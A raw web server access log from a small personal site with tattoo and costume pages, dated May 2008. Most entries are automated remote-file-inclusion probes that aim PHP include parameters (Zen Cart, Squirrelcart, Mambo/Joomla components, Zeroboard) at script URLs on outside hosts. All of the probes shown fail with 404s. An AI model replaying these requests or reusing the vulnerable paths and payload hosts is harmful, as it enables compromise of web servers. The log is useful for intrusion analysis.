216.167.156.20 - - [28/May/2008:20:41:59 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:20:41:59 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
217.160.203.190 - - [28/May/2008:20:44:33 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.160.203.190 - - [28/May/2008:20:44:33 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.145.146.10 - - [28/May/2008:20:46:43 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
212.145.146.10 - - [28/May/2008:20:46:43 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
69.94.56.38 - - [28/May/2008:20:47:31 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 313 "-""libwww-perl/5.48"
69.94.56.38 - - [28/May/2008:20:47:31 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 308 "-""libwww-perl/5.48"
87.106.101.24 - - [28/May/2008:20:49:01 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.101.24 - - [28/May/2008:20:49:01 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.83.213.66 - - [28/May/2008:20:50:17 -0500] "GET /logs/access_log.1207180800///////mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
212.83.213.66 - - [28/May/2008:20:50:17 -0500] "GET ///////mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
212.83.213.66 - - [28/May/2008:20:50:17 -0500] "GET /logs///////mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
74.6.18.239 - - [28/May/2008:20:50:58 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.11.243 - - [28/May/2008:20:50:59 -0500] "GET /logs/access_log.1184716800 HTTP/1.0" 200 121523 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.194.82.172 - - [28/May/2008:20:53:23 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.194.82.172 - - [28/May/2008:20:53:24 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
74.53.229.194 - - [28/May/2008:20:53:51 -0500] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.229.194 - - [28/May/2008:20:53:51 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.30.73.117 - - [28/May/2008:20:54:49 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 316 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
89.108.67.59 - - [28/May/2008:20:54:51 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/shelloff/scan/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.67.59 - - [28/May/2008:20:54:52 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/shelloff/scan/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.188.60.54 - - [28/May/2008:20:56:12 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.188.60.54 - - [28/May/2008:20:56:12 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.145.146.10 - - [28/May/2008:21:03:41 -0500] "GET /logs/access_log.1207180800//squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
212.145.146.10 - - [28/May/2008:21:03:42 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
212.145.146.10 - - [28/May/2008:21:03:42 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
212.34.138.245 - - [28/May/2008:21:04:11 -0500] "GET /logs/access_log.1207180800//squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
212.34.138.245 - - [28/May/2008:21:04:11 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
212.34.138.245 - - [28/May/2008:21:04:12 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
70.168.36.247 - - [28/May/2008:21:07:47 -0500] "GET /logs//errors.php?error=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
70.168.36.247 - - [28/May/2008:21:07:52 -0500] "GET //errors.php?error=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
65.55.208.135 - - [28/May/2008:21:18:52 -0500] "GET /logs/access_log.1192233600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
24.18.110.240 - - [28/May/2008:21:26:41 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; MS-RTC LM 8; Media Center PC 5.0; InfoPath.2; Zune 2.5)"
24.18.110.240 - - [28/May/2008:21:26:42 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; MS-RTC LM 8; Media Center PC 5.0; InfoPath.2; Zune 2.5)"
24.18.110.240 - - [28/May/2008:21:26:42 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; MS-RTC LM 8; Media Center PC 5.0; InfoPath.2; Zune 2.5)"
24.18.110.240 - - [28/May/2008:21:26:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; MS-RTC LM 8; Media Center PC 5.0; InfoPath.2; Zune 2.5)"
74.6.17.187 - - [28/May/2008:21:30:39 -0500] "GET /logs/access_log.1156291200 HTTP/1.0" 200 222929 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.120 - - [28/May/2008:21:30:54 -0500] "GET /logs/access_log.1156291200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [28/May/2008:21:30:54 -0500] "GET /logs/access_log.1193529600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [28/May/2008:21:30:54 -0500] "GET /logs/access_log.1198627200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.167.156.20 - - [28/May/2008:21:34:59 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:21:34:59 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:21:35:00 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.34.210.27 - - [28/May/2008:21:40:03 -0500] "GET /costume/ HTTP/1.1" 200 - "http://en.wikipedia.org/wiki/Costumes""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; BellSouth/1.0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
195.12.53.176 - - [28/May/2008:21:40:46 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.12.53.176 - - [28/May/2008:21:40:47 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.175.202.198 - - [28/May/2008:21:42:48 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.google.com/search?q=costumes+from+then+natins&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.175.202.198 - - [28/May/2008:21:42:48 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.175.202.198 - - [28/May/2008:21:42:48 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.175.202.198 - - [28/May/2008:21:42:48 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.175.202.198 - - [28/May/2008:21:42:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.12.53.176 - - [28/May/2008:21:46:57 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
65.55.208.132 - - [28/May/2008:21:48:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [28/May/2008:21:48:37 -0500] "GET /logs/access_log.1168560000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
77.221.130.9 - - [28/May/2008:21:53:15 -0500] "GET /logs//include.php?path[docroot]=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
77.221.130.9 - - [28/May/2008:21:53:15 -0500] "GET //include.php?path[docroot]=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
74.6.18.172 - - [28/May/2008:21:54:34 -0500] "GET /artwork/txt.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
141.53.8.217 - - [28/May/2008:22:04:29 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
141.53.8.217 - - [28/May/2008:22:04:30 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
65.55.208.122 - - [28/May/2008:22:14:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [28/May/2008:22:14:30 -0500] "GET /logs/access_log.1156464000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [28/May/2008:22:16:45 -0500] "GET /logs/access_log.1207699200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.147.239.5 - - [28/May/2008:22:18:12 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
217.147.239.5 - - [28/May/2008:22:18:18 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
202.179.180.45 - - [28/May/2008:22:28:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.45 - - [28/May/2008:22:28:57 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
65.55.208.123 - - [28/May/2008:22:34:20 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
194.106.229.35 - - [28/May/2008:22:39:45 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
194.106.229.35 - - [28/May/2008:22:39:45 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
70.86.26.122 - - [28/May/2008:22:43:21 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
70.86.26.122 - - [28/May/2008:22:43:21 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
65.55.208.130 - - [28/May/2008:22:43:25 -0500] "GET /logs/access_log.1208822400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.9.228.149 - - [28/May/2008:22:43:27 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
72.9.228.149 - - [28/May/2008:22:43:27 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
65.55.208.120 - - [28/May/2008:22:54:28 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [28/May/2008:22:54:40 -0500] "GET /logs/access_log.1190332800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
70.86.26.122 - - [28/May/2008:22:56:11 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
70.86.26.122 - - [28/May/2008:22:56:11 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
65.55.208.121 - - [28/May/2008:22:56:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [28/May/2008:22:56:57 -0500] "GET /?D=A HTTP/1.1" 200 1243 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.244.130.90 - - [28/May/2008:23:01:32 -0500] "GET /logs/index.php?/skin/zero_vote/ask_password.php?dir=%20%22zeroboard%22%20net%20%22zeroboard%22%20ukhttp://h1.ripway.com/ulandary/testing.txt? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.244.130.90 - - [28/May/2008:23:01:33 -0500] "GET /index.php?/skin/zero_vote/ask_password.php?dir=%20%22zeroboard%22%20net%20%22zeroboard%22%20ukhttp://h1.ripway.com/ulandary/testing.txt? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.244.130.90 - - [28/May/2008:23:09:43 -0500] "GET /index3.php?/skin/zero_vote/ask_password.php?dir=%20%22zeroboard%22%20net%20%22zeroboard%22%20ukhttp://h1.ripway.com/ulandary/testing.txt? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.244.130.90 - - [28/May/2008:23:09:43 -0500] "GET /logs/index3.php?/skin/zero_vote/ask_password.php?dir=%20%22zeroboard%22%20net%20%22zeroboard%22%20ukhttp://h1.ripway.com/ulandary/testing.txt? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.244.130.90 - - [28/May/2008:23:15:23 -0500] "GET /about.php?/skin/zero_vote/ask_password.php?dir=%20%22zeroboard%22%20net%20%22zeroboard%22%20ukhttp://h1.ripway.com/ulandary/testing.txt? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.244.130.90 - - [28/May/2008:23:15:23 -0500] "GET /logs/about.php?/skin/zero_vote/ask_password.php?dir=%20%22zeroboard%22%20net%20%22zeroboard%22%20ukhttp://h1.ripway.com/ulandary/testing.txt? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
205.134.240.162 - - [28/May/2008:23:32:44 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
205.134.240.162 - - [28/May/2008:23:32:44 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
75.125.252.82 - - [28/May/2008:23:42:13 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
75.125.252.82 - - [28/May/2008:23:42:13 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.84.106.68 - - [28/May/2008:23:45:36 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
70.84.106.68 - - [28/May/2008:23:45:36 -0500] "GET //config/dbutil.bck.php?confdir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.6.12.43 - - [28/May/2008:23:46:16 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [28/May/2008:23:46:16 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.9.228.149 - - [28/May/2008:23:48:04 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
72.9.228.149 - - [28/May/2008:23:48:04 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
195.12.53.176 - - [28/May/2008:23:48:23 -0500] "GET //plugins/payment/cc_core/cc_core.inc.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 324 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
74.6.76.46 - - [28/May/2008:23:48:46 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.9.228.149 - - [28/May/2008:23:50:12 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
72.9.228.149 - - [28/May/2008:23:50:12 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
195.12.53.176 - - [28/May/2008:23:51:50 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
195.12.53.176 - - [28/May/2008:23:52:00 -0500] "GET //plugins/payment/cc_core/cc_core.inc.php?phpbb_root_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
89.108.67.59 - - [28/May/2008:23:53:36 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/shelloff/scan/sistem.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
89.108.67.59 - - [28/May/2008:23:53:36 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/shelloff/scan/sistem.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
216.227.209.138 - - [28/May/2008:23:54:47 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.227.209.138 - - [28/May/2008:23:54:47 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.12.53.176 - - [28/May/2008:23:55:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.12.53.176 - - [28/May/2008:23:55:13 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.12.53.176 - - [28/May/2008:23:56:37 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
217.160.203.190 - - [28/May/2008:23:57:21 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
217.160.203.190 - - [28/May/2008:23:57:22 -0500] "GET //Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.55.208.135 - - [28/May/2008:23:58:49 -0500] "GET /logs/access_log.1201824000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
195.12.53.176 - - [28/May/2008:23:59:02 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
216.227.209.138 - - [29/May/2008:00:01:08 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.212.173.42 - - [29/May/2008:00:01:43 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
67.212.173.42 - - [29/May/2008:00:01:43 -0500] "GET //Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
217.160.203.190 - - [29/May/2008:00:01:53 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
217.160.203.190 - - [29/May/2008:00:01:54 -0500] "GET //Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
209.164.178.178 - - [29/May/2008:00:01:57 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
209.163.169.99 - - [29/May/2008:00:02:24 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
209.163.169.99 - - [29/May/2008:00:02:25 -0500] "GET //Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
78.129.197.54 - - [29/May/2008:00:04:41 -0500] "GET /logs/config.inc.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
216.167.156.20 - - [29/May/2008:00:04:41 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
